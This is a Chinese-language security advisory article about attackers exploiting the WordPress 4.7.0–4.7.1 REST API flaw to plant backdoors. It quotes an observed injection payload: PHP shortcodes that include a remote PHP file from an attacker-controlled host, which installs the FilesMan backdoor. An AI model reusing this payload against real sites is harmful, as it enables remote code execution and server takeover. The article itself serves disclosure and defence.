高危漏洞預警:WordPressRESTAPI被利用安裝後門

寒凝雪發表於2017-05-02

近期攻擊者發現了一種利用WordPress REST API漏洞的方法,並通過安裝隱藏的後門來獲得對受害者伺服器的完全訪問。

1月26日,WordPress團隊釋出了WordPress 4.7.2,其中包含一個解決WordPress REST API中的漏洞的祕密修復,影響到REST API——來自Sucuri的安全研究人員最先發現該漏洞。未經授權的攻擊者利用該漏洞可注入惡意內容,以及進行提權,對文章、頁面等內容進行修改。REST API是最近新增到WordPress 4.7.0並預設啟用的。

漏洞發現者Sucuri介紹,這個缺陷影響WordPress 4.7.0和4.7.1,並允許攻擊者製作惡意HTTP請求,當傳送到一個WordPress網站將允許黑客繞過身份驗證方法,並更改部落格帖子的標題和內容和靜態 頁面。

簡單來說,攻擊者發現了通過REST API缺陷將自己的PHP程式碼傳送到WordPress站點的方法,直到那時它才被用於改變原有的文字。

content:"[insert_php] include(`http[:]//acommeamour.fr/tmp/xx.php`); [/insert_php]
[php] include(`http[:]//acommeamour.fr/tmp/xx.php`); [/php]",
"id":"61a"}

在實時攻擊中看到的上述原始碼片段將告訴WordPress引擎在每次使用者訪問該特定頁面時執行以下PHP命令,如果黑客插入木馬或其他惡意指令碼,影響將會擴大。

include(`http[:]//acommeamour.fr/tmp/xx.php`);

這行PHP程式碼將在受害者的站點上包含一個遠端PHP檔案,它將在WordPress / wp-content / uploads /資料夾中下載並安裝FilesMan PHP後門。

在將其HTTP請求傳送到站點的WordPress REST API後,攻擊者只需訪問一次損壞的頁面,然後訪問後門並接管受害者的底層伺服器。

鑑於WordPress使用的廣泛性,該漏洞的影響還是比較大的。使用 WordPress REST API 是簡便高效的通過 JSON 格式傳輸資料訪問或控制 WordPress 站點內容的方法。API 提供了對使用者、文章、分類等不同功能的控制,也可以通過 API 檢索或修改文章。Wordpress REST API 外掛在 4.70 整合到 WordPress 中,由於許可權控制失效導致內容注入或修改。WordPress開發團隊已經與Sucuri配合在最新的4.7.2版本中修復了該漏洞。

本文來自開源中國社群 [http://www.oschina.net]


相關文章